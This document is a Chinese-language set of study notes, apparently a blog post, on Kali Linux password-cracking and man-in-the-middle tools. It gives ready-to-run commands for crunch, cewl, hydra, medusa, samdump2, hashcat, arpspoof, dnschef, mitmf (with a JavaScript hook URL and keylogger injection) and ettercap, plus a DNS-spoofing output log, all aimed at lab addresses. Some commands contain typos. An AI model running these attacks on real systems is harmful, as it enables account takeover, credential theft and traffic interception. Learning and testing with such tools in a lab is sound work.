kali上密碼工具使用例如mudusa，hydra等

 

思路

各種密碼類別大致數學原理
https://blog.csdn.net/carol980206/article/details/96705859
https://www.jianshu.com/p/cb77838c69db

目標系統實施了強安全措施

1. 安裝了所有補丁
2. 無任何已知漏洞
3. 無應用層漏洞
4. 攻擊面最小化

社會工程學

獲取目標系統用戶身份

1. 非授權用戶不受信，認證用戶可以訪問守信資源
2. 已有用戶賬號權限受
3. 不觸發系統報警

密碼破解

人工猜解

1. 垃圾桶工程
2. 被動信息搜集

基於字典暴力破解

鍵盤空間字符爆破

字典

1. 保存有用戶名和密碼的文本文件
2. /usr/share/wordlist
3. /usr/share/wf
4. uzz/wordlist
5. /usr/share/seclists

鍵盤空間字符爆破

https://blog.csdn.net/weilijia13/article/details/70175787
1. 全鍵盤空間字符 2. 部分鍵盤空間字符 3. 數字，小寫字母，大寫字母，符號空格，瑞典字符，高位ASCII碼 4. crunch <min-len><max-len>[] [options]- < charset string >默認是小寫字符

crunch 6 6 0123456789 -o START -D 2 -B 1MB / -C 100
-b 按大小分割字典文件，即將原本完整的字典文件分割為1mb一個字典文件。 
-c字典行數
以上兩位必須使用 -o START 進行結合使用
-d 同意字符連貫出現數量（11/aaa）

字符集

- crunch 4 4 -f charset.lst lalpha-sv -o 1.txt
無重復字符
- crunch 1 1 0p 1234567890 | more
- 必須是最后一個參數
- 最大最小字符長度失效，但必須存在
- 與-s參數不兼容
- crunch 4 4 0123456789 -s 9990
讀取文件中每行內容作為基本字符生成字典
- crunch 1 1 -q read 

字典組成規則

crunch 6 6 -t @,%%^^ | more
- @ 小寫字符  
- . 大寫字符  
- % 數字  
- ^ 符號  
 

輸出文件壓縮

- crunch 4 4 -t @,%^ -o 1.txt -z 7z  
- 其他壓縮格式 ：gzip,bzip2，lzma  
- 7z壓縮比率最大  

crunch 5 5 abc DEF + !@# -t ,@^%,
我們使用-t來指定所選字符集的類型，即第一個為大寫字符，第二個為小寫字符，第三個為特殊字符，第四個是數字，第五個又是大寫字符。 其中\是轉義字符，+是占位符，表示選用的是默認的。
crunch 5 5 -t ddd%% -p dog cat bird
此處ddd代指的就是-p當中的三個參數，任何不同於-p參數指定的值都可以作為占位符。
crunch 5 5 -d 2@ -t @@@%%
此處進行了限制即相同的連續小寫字母只能連續兩次最多，即此處不會生成aaa，可能為aab

專屬的密碼字典

CUPP：通過個人信息進行密碼破解。
root@kali:~/common-password# python cupp.py -i
cewl：通過手機網站信息生成字典。

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
-m:最小單詞長度 
-d：爬網深度
-e：手機包括email地址信息
-c：每個單詞出現次數

hydra

https://blog.csdn.net/cjx529377/article/details/85418802 https://blog.csdn.net/csacs/article/details/88141215

 hydra -l user -P passlist.txt ftp://192.168.0.1
 hydra -L userlist.txt -p defaultpwimap://192.168.0.1/PLAIN
 hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
 hydra -l admin -p password ftp://[192.168.0.0/24]/
 hydra -L logins.txt -P pws.txt -M targets.txt ssh
windows密碼破解
- hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd
- hydra -l adminstrator -P pass.lst rbp://1.1.1.1 -t 1 -vV
linux密碼破解
- hydra -l root -P passwd.lst ssh://1.1.1.1 -vV
其他服務密碼破解
- hydra -L user.list -P pass.lst fpt://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64  
- -e nsr n:空密碼 s：賬號密碼相同 r：賬號密碼相反   
我們可以使用hydra -R來繼續上一次未完成的破解。     
hydra -l admin -P john.txt 192.168.1.1.http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:S=index.php" -t 1 -v
其實此處不會有返回結果，因為服務器會進行302重定向，不會反悔login failed 而是會返回 login.php這個頁面，但如果登陸成功的話那么就會返回index.php這樣我們在burp當中使用forward會跳轉到index.php,但此時還是會有問題，我們需要將驗證結果指為正確登錄的返回結果，即S=index.php
hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USAR^&pass=^PASS^&Login=Lin:Login Failed" -V
/foo.php:user=^USER^&pass=^PASS^:S=sucess:C=/page/cookie:H=X-Foo:Foo
C:先訪問指定頁面取得的cookie
H：指定http頭
https-post-form,http-get-form,https-get-form

密碼破解效率
- 密碼復雜度 - 帶寬，協議，服務器性能，客戶端性能 - 鎖定閥值 - 單位時間最大登錄請求次數

pw—inspctor

-i 輸入文件
-o 輸出文件
-m 有效密碼的最小長度
-M 有效密碼的最大長度
-l 小寫字母
-u 大學字母
-p 可打印的字符
-s 特殊字符
-n 數字

pw-inspector -i pass.lst -o up.lst -l  

篩選pass.lst字典小寫字符輸出為lp.lst(包含一個小寫字母也算

pw-inspector -i pass.lst -o up.lst -l u

篩選pass.lst字典小寫字符輸出為up.lst(包含一個大寫字母也算

medusa

hydra缺點： 穩定性差，程序時常崩潰。
速度控制不好，容易觸發服務屏蔽或鎖死機制。
沒主機新建進程，沒服務新建實例。
大量目標破解時性能差。
medusa特點：。
穩定性好。
速度控制得當。
基於線程。
支持模塊少於hydra。
web-form支持存在缺陷。

medusa -d 
破解windows密碼
- medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
破解linuxSSH密碼
medusa -M ssh -h 192.168.214.135 -u root -P [ass.lst -e ns -F 
其他服務密碼破解
-medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F
-medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pass=password&Login-Login"

-n 非默認參數 -s 使用ssl連接 -T 並發主機數 https://blog.csdn.net/cnsdlywei/article/details/83213607 https://blog.csdn.net/u010984277/article/details/50792816

離線密碼破解

身份驗證： - 禁止明文傳輸密碼 - 每次認證使用HASH算法加密密碼傳輸 - 服務端用戶數據湖贏加鹽加密保存 破解思路： - 嗅探獲取密碼HASH - 利用漏洞登錄服務器並從用戶數據庫獲取密碼HASH - 識別HASH類型：長度字符集 - 利用離線破解工具碰撞密碼HASH

離線密碼破解

windows HASH獲取工具 - 我們需要知道在windows當中我們的SAM數據庫存放着我們賬號密碼的密文信息。 - 利用漏洞：Pwdump，fgdump，mimikatz，wce//已經有了登錄權限 - 物理接觸：samdump2//思路使用kali引導這台電腦，我們在光盤當中插入kali的iso文件，使用kali進行啟動，然后進入live模式，查看機器的本地硬盤 - fdisk -l - kali iso啟動虛擬機 - mount/dev/sda1/mnt - cd /mnt/Windows/System32/config - samdump2 SYSTEM SAM -o sam.hash - cat sam.hash此時我們可以查看， - 利用nc傳輸HASH 我們在system當中設置一個秘鑰，此時我們登陸的時候需要進行兩道密碼的輸入。

HASHCAT

https://blog.csdn.net/SHIGUANGTUJING/article/details/90074614
開源多線程密碼破解工具 支持80多種加密算法破解 基於cpu的計算能力破解 有6種模式 - a 0 straight:字典破解 - a 1 combination 講字典中密碼進行組合（1 2 > 11 22 12 21） - a 2 Toggle case 嘗試字典中所有密碼的大小寫組合 - a 3 Brute force 指定字符集所有組合 - a 4 Permutation 字典中密碼的全部字符置換組合 - a 5 Table-lookup 程序為字典中所有密碼自動生成掩碼
我們在syskey當中又設置秘鑰之后，此時按照上述也能獲得一串hash值，但是我們放到hashcat中進行解密，發現是沒有結果的 hashcat -m 1000 -a 3 sam1.hash -i --increment-min 4 --increment-max 6 ?a?a?a?a?a?a Bootkey利用RC4算法加密SAM數據庫，Bootkey保存在SYStem文件當中，我們可以使用吧

掩碼的設置

    l | abcdefghijklmnopqrstuvwxyz          純小寫字母
    u | ABCDEFGHIJKLMNOPQRSTUVWXYZ          純大寫字母
    d | 0123456789                  純數字
    h | 0123456789abcdef                常見小寫子目錄和數字
    H | 0123456789ABCDEF                常見大寫字母和數字
    s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~       特殊字符
    a | ?l?u?d?s                    鍵盤上所有可見的字符
    b | 0x00 - 0xff                 可能是用來匹配像空格這種密碼的
八位數字密碼：?d?d?d?d?d?d?d?d
八位未知密碼：?a?a?a?a?a?a?a?a 
前四位為大寫字母，后面四位為數字：?u?u?u?u?d?d?d?d
前四位為數字或者是小寫字母，后四位為大寫字母或者數字：?h?h?h?h?H?H?H?H
前三個字符未知，中間為admin，后三位未知：?a?a?aadmin?a?a?a
6-8位數字密碼：--increment --increment-min 6 --increment-max 8 ?l?l?l?l?l?l?l?l
6-8位數字+小寫字母密碼：--increment --increment-min 6 --increment-max 8 ?h?h?h?h?h?h?h?h

攻擊模塊

# | Mode
 ===+======
  0 | Straight（字段破解）
  1 | Combination（組合破解）
  3 | Brute-force（掩碼暴力破解）
  6 | Hybrid Wordlist + Mask（字典+掩碼破解）
  7 | Hybrid Mask + Wordlist（掩碼+字典破解）

oclhashcat

號稱世界最快，唯一基於GPU的密碼破解軟件 免費開源，支持多平台，支持分布式，150+haash算法 硬件支持： 虛擬機中無法使用 支持CUDA技術的Nvidia顯卡 支持OpenCL技術的AMD顯卡 安裝相應的驅動

rainbowcrack

我們省卻了將字典轉換成hash值的過程，直接進行碰撞。 基於時間記憶權衡技術生成彩虹表 提前計算密碼的HASH值，通過對比HASH破解密碼 計算HASH的速度很慢，修改版支持CUDA,GPU kali中包含RAINBOECRACK工具 rtgen：預計算，聲場彩虹表，耗時的階段 rtsort：對rtgen生成的彩虹表進行排序 rcrack：查找彩虹表破解密碼 以上命令必須順序使用。 密碼明文，HASH值，HASH算法，字符集，明文長度范圍都是彩虹表的構成元素 在rtgen當中：lanman,ntlm,md2,md4,md5,sha1,ripemd160這幾種算法，當然計算彩虹表的時間可能很長：rtgen 算法 字符集 明文密碼最小長度 明文密碼最大長度 表的索引 鏈的長度 鏈的數量 https://blog.csdn.net/qq_35976271/article/details/79026140

john

https://blog.csdn.net/lonet/article/details/6621385
支持眾多服務應用的加密破解，支持某些對稱加密算法破解。
模式：Wordlist：基於規則的字典破解
single crack：默認被受限制性，使用login信息嘗試破解。
incremental：所有或指定字符集的暴力破解。
external：需要在主配文件中使用c語言子集編程。
我們可以使用shadow進行合並，當然我們也可以使用圖形化界面johnny。

ophcrack

也是一種圖形化破解工具

密碼嗅探

二，三層地址
ip網絡到網絡
mac主機到主機
交換機與HUB
HUB全端口轉發
交換機根據學習地址轉發
混雜模式抓包
二層地址基於廣播進行傳送，所以在局域網內部，二層地址是可以廣播尋址，發送廣播。
三層要經過三層的路由設備進行三層路由尋址，如果一個路由發現塔索連個呢個網段的所尋的地址它的另一端連着，那么就會繼續尋址，會經過本網段的網關，廣播繼續發送尋找另一個網段的網關，然后獲得那個網關的mac地址， 然后更改mac地址。
HUB：全端口轉發，不識別二層報頭，一般情況下，網卡都是非混雜模式的，抓包工具可以把網卡置為混雜模式，把所有流經我的網卡的流量都抓下來，但這對於計算機的性能是有極大的消耗的。
交換機：這就是一個二層網絡設備了，交換機對於廣播包是都進行轉發的,交換機就避免了新歌能的損耗，交換機當中的內存會記錄與其相連的及其第一次發的包的ip地址作為其mac地址，交換機可以直接將信息轉給另一個端口。
但這並不意味着我們無法做arp密碼嗅探了。
ARP協議的請求，相應是相對獨立的，那么我們就可以編造一個響應的數據包，任何一個這個網段的人都可以隨意發響應包，並且機器接收到響應包都是無條件信任的這個響應包，是不需要請求的。，遮陽消息就會傳遞給偽造者的mac地址，這就是arp欺騙，接下來我們就可以實現中間人攻擊。

開啟路由轉發功能

root@kali:~# cat /proc/sys/net/ipv4/ip_forward
0   //此處默認為0
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward             //將其修改為1，即開啟此功能

網絡嗅探

arpspoof -i eth0 -t 192.168.1.112 192.168.1.1//前面的是被欺騙者，后者是網關 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
driftnet -i eth0 -a -d tempdir -s dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts urlsnarf -i eth0 webspy -i eth0 1.1.1.10

DNS欺騙代理

https://blog.csdn.net/xiaoxuetu_/article/details/76042369
-dnschef --fakeip=1.01.1.10 //我們要欺騙的ip具體要解析的地址 --fakedomains=www.google.com,www.youtubo.com //我們要欺騙的--interface 192.168.214.135//在哪塊網卡進行偵聽
在進行偵聽的時候，我們需要將被欺騙的機器網絡屬性進行配置，使他的電腦上的dns服務器指向我們的kali機器。 進行修改你要欺騙之后網頁顯示的內容:/var/www/html/index.html 我們使用ettercap也可以完成：

中間人攻擊

https://www.cnblogs.com/ssooking/p/6036665.html
注入xss：即使沒有xss ，液可以凌空向每個HTTP請求中注入xss攻擊，一旦得手，影響范圍巨大，而且如果中間人發生在運營商線路上。 mitmf --spoof --arp //使用arp欺騙 -i eth0 //流量流經的網卡--gateway 192.168.1.1 //網關的地址 --target 192.168.1.114 //要欺騙的主機--inject --js-url http://1.1.3:3000/hook.js //插入的js代碼
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 -- target 192.168.1.114 --jskeylogger / upsidedownternet /--screen / ferreting /browserprofiler

root@kali:~# ettercap -T -q -M arp:remote -i eth0 /192.168.214.132// /192.168.214.2// -P dns_spoof

ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team

Listening on:
  eth0 -> 00:0C:29:12:E9:44
          192.168.214.150/255.255.255.0
          fe80::20c:29ff:fe12:e944/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to EUID 65534 EGID 65534...

  34 plugins
  42 protocol dissectors
  57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.214.132 00:0C:29:4A:1D:48

 GROUP 2 : 192.168.214.2 00:50:56:E7:2A:0C
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: A [www.baidu.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [web.vortex.data.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [teredo.ipv6.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [www.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [teredo.ipv6.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [vortex-win.data.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [settings-win.data.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [teredo.ipv6.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [go.microsoft.com] spoofed to [192.168.214.150] TTL [3600 s]
dns_spoof: A [www.baidu.com] spoofed to [192.168.214.150] TTL [3600 s]

Ettercap

統一的中間人攻擊工具
轉發MAC與本機相同，但ip與本機不同的數據包
支持SSH1,SSL中間人攻擊。
轉發包的原則：只轉發mac相同，而ip地址不同的包。
模塊划分：snifer，mitm，filter，log，plugin

snifer

負責數據包轉發
unified：單網卡情況下獨立完成三層包轉發，始終禁用內核IP-FORWARD功能
bridge：雙網卡情況下一層MITM模式，可作為IPS過濾數據卡，不可在網關上使用，這種模式下隱蔽性非常的高，幾乎不能被發現，這樣情況下是被視為像一根網線，一根進，一根輸出。

MITM

把流量重定向到ettercap主機上 可以使用其他工具實現MITM，etter只做嗅探和過濾使用。 實現MITM的方法：ARP,ICMP//ICMP路由重定向，半雙工，路由的過程是不對稱的，我們只能發現客戶端傳遞給服務端的包，而服務端的包是不流經中間人的 DHCP：修改網關地址，半雙工，Switch Port Stealing//flood目標地址是本機，原地址是受害者的包，適用於ARP靜態綁定的環境，可以雙向欺騙， NDP//ipv6協議欺騙技術。

在2.4以上內核對於ARP地址欺騙是有約束的，對於收到非請求的ARP響應包，不更新本地ARP緩存，而ettercap對於這種限制是可以發送ARP request包進行攻擊

用戶操作界面：
- T 文本界面
- G 圖形界面
- C 基於文本的圖形
- D 后台模式
ettercap mac地址/ipv4地址1/端口號 /ipv4地址2/ 遮陽就表示在1和2地址之間實現中間人攻擊，當然ipv6地址可以寫多個，ipv4 也可以寫多個。

權限

需要root權限打開鏈路層socket連接，然后使用noody賬號進行運行，日志寫入目錄需要nobody有寫入權，我們可以使用root賬號運行，但是如果有漏洞，對方可能就會獲得了root權限。
ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message //-F調用了過濾器 //-P 模塊名稱 //-w 將所有流量抓下來存取成a.cap 這個文件。 //-l 記錄簡單的日志信息 //-L 記錄全部的日志信息 filter可以幫助我們強制性把ssh協議版本降低，這樣我們就可以解密了，具體目錄就是：/usr/share/ettercap ICMP:-M icmp:mac地址/ip地址（真實的網關MAC/IP地址） DHCP: -M dhcp:192.168.0.30,35,50-60/225.225.225.0/192.168.0.1 Port: -M port/1.1.1.1//1.1.1.2/ NDP: -m NDP //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/